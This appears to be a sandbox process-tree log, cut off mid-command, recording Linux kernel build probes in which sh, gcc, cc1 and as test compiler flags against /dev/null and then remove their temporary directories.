/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 --param=allow-store-data-races=0 -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -mrecord-mcount -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"y\"; else echo \"n\"; fi"3⤵PID:1820
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_18204⤵PID:1821
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 "--param=allow-store-data-races=0" "-Wframe-larger-than=1024" -fstack-protector-strong -Wimplicit-fallthrough -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -mrecord-mcount -c -x c /dev/null -o /tmp/a/.tmp_1820/tmp4⤵
- Writes file to tmp directory
PID:1822 -
/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mrecord-mcount "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1820/tmp -O2 -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-Wimplicit-fallthrough=3" -Wno-unused-but-set-variable "-Wunused-const-variable=0" "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments --param "allow-store-data-races=0" -fstack-protector-strong -fstack-clash-protection -o /tmp/ccovWzfY.s5⤵PID:1823
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1820/tmp /tmp/ccovWzfY.s5⤵PID:1824
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1820/tmp /tmp/ccovWzfY.s5⤵PID:1824
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1820/tmp /tmp/ccovWzfY.s5⤵PID:1824
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1820/tmp /tmp/ccovWzfY.s5⤵PID:1824
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_18204⤵PID:1825
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 --param=allow-store-data-races=0 -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -mfentry -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"y\"; else echo \"n\"; fi"3⤵PID:1826
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_18264⤵PID:1827
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 "--param=allow-store-data-races=0" "-Wframe-larger-than=1024" -fstack-protector-strong -Wimplicit-fallthrough -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -mfentry -c -x c /dev/null -o /tmp/a/.tmp_1826/tmp4⤵PID:1828
-
/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mfentry "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1826/tmp -O2 -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-Wimplicit-fallthrough=3" -Wno-unused-but-set-variable "-Wunused-const-variable=0" "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments --param "allow-store-data-races=0" -fstack-protector-strong -fstack-clash-protection -o /tmp/ccR3BiDr.s5⤵
- Writes file to tmp directory
PID:1829
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1826/tmp /tmp/ccR3BiDr.s5⤵PID:1830
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1826/tmp /tmp/ccR3BiDr.s5⤵PID:1830
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1826/tmp /tmp/ccR3BiDr.s5⤵PID:1830
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1826/tmp /tmp/ccR3BiDr.s5⤵PID:1830
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_18264⤵PID:1831
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 --param=allow-store-data-races=0 -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -flive-patching=inline-clone -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \" -flive-patching=inline-clone\"; else echo \"\"; fi"3⤵PID:1832
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_18324⤵PID:1833
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 "--param=allow-store-data-races=0" "-Wframe-larger-than=1024" -fstack-protector-strong -Wimplicit-fallthrough -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY "-flive-patching=inline-clone" -c -x c /dev/null -o /tmp/a/.tmp_1832/tmp4⤵PID:1834
-
/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" -D CC_USING_FENTRY /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mrecord-mcount -mfentry "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1832/tmp -O2 -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-Wimplicit-fallthrough=3" -Wno-unused-but-set-variable "-Wunused-const-variable=0" "-std=gnu90" -p -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments "-flive-patching=inline-clone" --param "allow-store-data-races=0" -fstack-protector-strong -fstack-clash-protection -o /tmp/cc5ga4iQ.s5⤵
- Writes file to tmp directory
PID:1835
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1832/tmp /tmp/cc5ga4iQ.s5⤵PID:1836
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1832/tmp /tmp/cc5ga4iQ.s5⤵PID:1836
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1832/tmp /tmp/cc5ga4iQ.s5⤵PID:1836
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1832/tmp /tmp/cc5ga4iQ.s5⤵PID:1836
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_18324⤵PID:1837
-
-
-
/usr/local/sbin/gccgcc "-print-file-name=include"3⤵PID:1838
-
-
/usr/local/bin/gccgcc "-print-file-name=include"3⤵PID:1838
-
-
/usr/sbin/gccgcc "-print-file-name=include"3⤵PID:1838
-
-
/usr/bin/gccgcc "-print-file-name=include"3⤵PID:1838
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 --param=allow-store-data-races=0 -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -flive-patching=inline-clone -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wstringop-truncation -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-stringop-truncation\"; else echo \"\"; fi"3⤵PID:1839
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_18394⤵PID:1840
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 "--param=allow-store-data-races=0" "-Wframe-larger-than=1024" -fstack-protector-strong -Wimplicit-fallthrough -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY "-flive-patching=inline-clone" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wstringop-truncation -c -x c /dev/null -o /tmp/a/.tmp_1839/tmp4⤵PID:1841
-
/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" -D CC_USING_FENTRY /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mrecord-mcount -mfentry "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1839/tmp -O2 -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-Wimplicit-fallthrough=3" -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wstringop-truncation "-std=gnu90" -p -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments "-flive-patching=inline-clone" --param "allow-store-data-races=0" -fstack-protector-strong -fstack-clash-protection -o /tmp/ccrIRnNp.s5⤵PID:1842
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1839/tmp /tmp/ccrIRnNp.s5⤵PID:1843
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1839/tmp /tmp/ccrIRnNp.s5⤵PID:1843
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1839/tmp /tmp/ccrIRnNp.s5⤵PID:1843
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1839/tmp /tmp/ccrIRnNp.s5⤵PID:1843
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_18394⤵PID:1844
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 --param=allow-store-data-races=0 -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -flive-patching=inline-clone -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wzero-length-bounds -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-zero-length-bounds\"; else echo \"\"; fi"3⤵PID:1845
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_18454⤵PID:1846
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 "--param=allow-store-data-races=0" "-Wframe-larger-than=1024" -fstack-protector-strong -Wimplicit-fallthrough -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY "-flive-patching=inline-clone" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wzero-length-bounds -c -x c /dev/null -o /tmp/a/.tmp_1845/tmp4⤵PID:1847
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_18454⤵PID:1848
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 